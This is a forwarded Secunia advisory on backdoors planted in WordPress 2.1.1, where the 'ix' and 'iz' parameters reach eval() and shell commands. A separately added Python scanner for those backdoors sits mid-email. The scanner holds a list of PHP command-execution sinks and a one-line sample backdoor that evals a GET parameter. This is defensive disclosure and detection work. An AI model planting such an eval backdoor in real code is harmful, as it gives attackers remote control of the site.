For those who like using WordPress.

Regards,
Ladung

-----Original Message-----
From: Secunia Security Advisories [mailto:[EMAIL PROTECTED] 
Sent: 05 March 2007 21:34
To: [EMAIL PROTECTED]
Subject: [SA24374] WordPress Command Execution and PHP "eval()" Injection

TITLE:
WordPress Command Execution and PHP "eval()" Injection

SECUNIA ADVISORY ID:
SA24374

VERIFY ADVISORY:
http://secunia.com/advisories/24374/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
WordPress 2.x
http://secunia.com/product/6745/

DESCRIPTION:
Ivan Fratric has reported two vulnerabilities in WordPress, which can be
exploited by malicious people to compromise vulnerable systems.

1) Input passed to the "ix" parameter in wp-includes/feed.php is not
properly sanitised before being used in "eval()" calls. This can be
exploited to execute arbitrary PHP code.

2) Input passed to the "iz" parameter in wp-includes/theme.php is not
properly sanitised before being used to execute commands. This can be
exploited to execute arbitrary shell commands.

NOTE: The vulnerabilities were reportedly added by someone breaking into
WordPress's servers.

The vulnerabilities are reported in version 2.1.1 downloaded on
2007-02-25 or later.
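As an added example (not part of the advisory and not WordPress code), a defender-side check that a WordPress tree does not carry the two planted parameters described above. The file paths, parameter names and affected version come from the advisory; the list of command-execution sinks for theme.php and the parsing of $wp_version from wp-includes/version.php are assumptions.

```python
import re
from pathlib import Path

# Indicators taken from SA24374: the request parameter each planted hook reads
# and the file it was found in. The sink list for theme.php is an assumption;
# the advisory only says the input is "used to execute commands".
INDICATORS = {
    "wp-includes/feed.php": ("ix", ("eval",)),
    "wp-includes/theme.php": ("iz", ("system", "exec", "passthru",
                                     "shell_exec", "popen", "proc_open")),
}
PARAM_RE = r"\$_(?:GET|POST|REQUEST)\s*\[\s*['\"]{name}['\"]\s*\]"
VERSION_RE = r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]"

def scan_source(src, param, sinks):
    """Check one file's source. Reading the planted parameter at all is the
    strong signal (these files have no legitimate reason to read it); the
    sinks found are reported for the analyst's context."""
    reads_param = re.search(PARAM_RE.format(name=param), src) is not None
    sink_hits = [s for s in sinks if re.search(r"\b%s\s*\(" % s, src)]
    return {"reads_param": reads_param, "sinks": sink_hits,
            "suspicious": reads_param}

def wp_version(src):
    """Extract $wp_version from wp-includes/version.php (None if absent)."""
    m = re.search(VERSION_RE, src)
    return m.group(1) if m else None

def scan_install(root):
    """Scan a WordPress tree: version plus per-file findings."""
    root = Path(root)
    report = {"version": None, "files": {}}
    vfile = root / "wp-includes" / "version.php"
    if vfile.is_file():
        report["version"] = wp_version(vfile.read_text(errors="replace"))
    for rel, (param, sinks) in INDICATORS.items():
        path = root / rel
        if path.is_file():
            report["files"][rel] = scan_source(
                path.read_text(errors="replace"), param, sinks)
    # Only 2.1.1 copies fetched on/after 2007-02-25 were affected and 2.1.2 is
    # the fix, so 2.1.1 means "review the files", not "definitely compromised".
    report["needs_review"] = report["version"] == "2.1.1" or any(
        f["suspicious"] for f in report["files"].values())
    return report

# Constructed samples (not WordPress code) so the scanner runs offline.
CLEAN_FEED = "<?php\nfunction get_the_title_rss() { return 'title'; }\n"
PLANTED_FEED = "<?php\nif (isset($_GET['ix'])) { eval($_GET['ix']); }\n"

if __name__ == "__main__":
    print(scan_source(CLEAN_FEED, *INDICATORS["wp-includes/feed.php"]))
    print(scan_source(PLANTED_FEED, *INDICATORS["wp-includes/feed.php"]))
```

Run `scan_install("/path/to/wordpress")` against a real tree; a hit on either file is grounds to replace the install from a clean 2.1.2 download rather than patch in place.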

SOLUTION:
Update to version 2.1.2.

PROVIDED AND/OR DISCOVERED BY:
Ivan Fratric

ORIGINAL ADVISORY:
Ivan Fratric:
http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html

WordPress:
http://wordpress.org/development/2007/03/upgrade-212/
